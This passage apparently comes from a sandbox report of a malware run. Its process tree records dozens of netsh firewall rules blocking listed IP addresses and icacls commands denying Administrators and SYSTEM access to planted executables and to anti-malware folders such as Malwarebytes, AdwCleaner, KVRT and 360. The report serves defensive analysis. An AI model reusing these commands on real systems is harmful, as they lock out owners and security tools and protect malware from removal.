        netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
        5⤵
        
        PID:4192
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
      4⤵
      PID:4784
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
        5⤵
        
        PID:4232
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
      4⤵
      PID:4932
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
        5⤵
        
        PID:4760
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
      4⤵
      PID:4708
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
        5⤵
        
        PID:5232
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
      4⤵
      PID:4924
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
        5⤵
        
        PID:5136
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
      4⤵
      PID:5168
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
        5⤵
        
        PID:5296
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
      4⤵
      PID:5180
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
        5⤵
        
        PID:5308
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
      4⤵
      PID:5332
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
        5⤵
        
        PID:5464
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
      4⤵
      PID:5356
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
        5⤵
        
        PID:5456
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
      4⤵
      PID:5496
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
        5⤵
        
        PID:5624
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
      4⤵
      PID:5508
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
        5⤵
        
        PID:5612
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
      4⤵
      PID:5652
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
        5⤵
        
        PID:5800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
      4⤵
      PID:5676
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
        5⤵
        
        PID:5808
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
      4⤵
      PID:5848
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
        5⤵
        
        PID:5956
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
      4⤵
      PID:5860
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
        5⤵
        
        PID:5964
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
      4⤵
      PID:6004
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
        5⤵
        
        PID:6120
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
      4⤵
      PID:6016
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
        5⤵
        
        PID:6128
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
      4⤵
      PID:4844
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
        5⤵
        
        PID:4868
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
      4⤵
      PID:4884
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
        5⤵
        
        PID:4136
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
      4⤵
      PID:4984
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
        5⤵
        
        PID:1012
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
      4⤵
      PID:4248
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
        5⤵
        
        PID:4124
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
      4⤵
      PID:4752
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
        5⤵
        
        PID:5856
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
      4⤵
      PID:4496
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
        5⤵
        
        PID:5608
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
      4⤵
      PID:5868
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
        5⤵
        
        PID:3872
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
      4⤵
      PID:4536
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
        5⤵
        
        PID:4504
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
      4⤵
      PID:4456
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
        5⤵
        
        PID:5228
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
      4⤵
      PID:5420
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
        5⤵
        
        PID:5340
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5336
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5512
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
      4⤵
      PID:5428
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:5664
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
      4⤵
      PID:4864
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
        5⤵
        
        PID:5840
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:2844
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
      4⤵
      PID:5532
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:5988
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
      4⤵
      PID:5704
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
        5⤵
        
        PID:5916
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5288
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5864
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
      4⤵
      PID:5908
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
        5⤵
        
        PID:6096
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
      4⤵
      PID:4256
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6136
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4252
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4620
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      PID:4268
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:5044
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)
      4⤵
      PID:4904
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\java.exe /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:5500
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)
      4⤵
      PID:3844
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\java.exe /deny System:(F)
        5⤵
        
        PID:6080
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)
      4⤵
      PID:5172
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\java.exe /deny система:(F)
        5⤵
        
        PID:3712
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:6112
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5680
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      4⤵
      PID:4424
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:5912
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4484
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5812
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
      4⤵
      PID:4172
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5768
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)
      4⤵
      PID:2620
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\windows\svchost.exe /deny Администраторы:(F)
        5⤵
        
        PID:5656
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)
      4⤵
      PID:4532
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\windows\svchost.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:5996
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)
      4⤵
      PID:2732
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\windows\svchost.exe /deny система:(F)
        5⤵
        Modifies file permissions
        
        PID:5328
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5760
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5968
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      PID:5708
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:5344
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5920
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6020
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      PID:4740
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5216
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5952
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:3924
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      PID:348
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4508
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:6108
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5556
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
      4⤵
      PID:5716
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5816
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5208
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2132
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
      PID:388
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        5⤵
        
        PID:1596
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
      4⤵
      PID:5176
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
        5⤵
        
        PID:5156
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)
      4⤵
      PID:4544
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\lsass.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:2832
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)
      4⤵
      PID:4644
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\kz.exe /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:5904
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)
      4⤵
      PID:5580
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\kz.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:6060
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)
      4⤵
      PID:5692
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\script.exe /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:5584
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)
      4⤵
      PID:4812
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\script.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:5668
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
      4⤵
      PID:4768
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:5396
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      PID:4460
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\programdata\Malwarebytes /deny System:(F)
        5⤵
        
        PID:5220
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)
      4⤵
      PID:5568
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\MB3Install /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:5140
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      PID:4888
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\MB3Install /deny System:(F)
        5⤵
        
        PID:5560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)
      4⤵
      PID:5364
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\olly.exe /deny Администраторы:(F)
        5⤵
        
        PID:4876
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)
      4⤵
      PID:4792
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\olly.exe /deny System:(F)
        5⤵
        
        PID:6124
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
      4⤵
      PID:5244
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
        5⤵
        
        PID:5960
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)
      4⤵
      PID:4628
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\lsass2.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:3824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)
      4⤵
      PID:5312
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\boy.exe /deny Администраторы:(F)
        5⤵
        
        PID:5184
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)
      4⤵
      PID:5008
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\boy.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:1312
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:2100
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:4300
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      PID:4724
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        5⤵
        
        PID:504
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4640
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5544
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
      4⤵
      PID:4560
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:5764
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5012
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2860
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5888
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5740
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5928
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5832
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      PID:5424
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2356
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4388
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5280
  - - C:\Windows\SysWOW64\cmd.exe
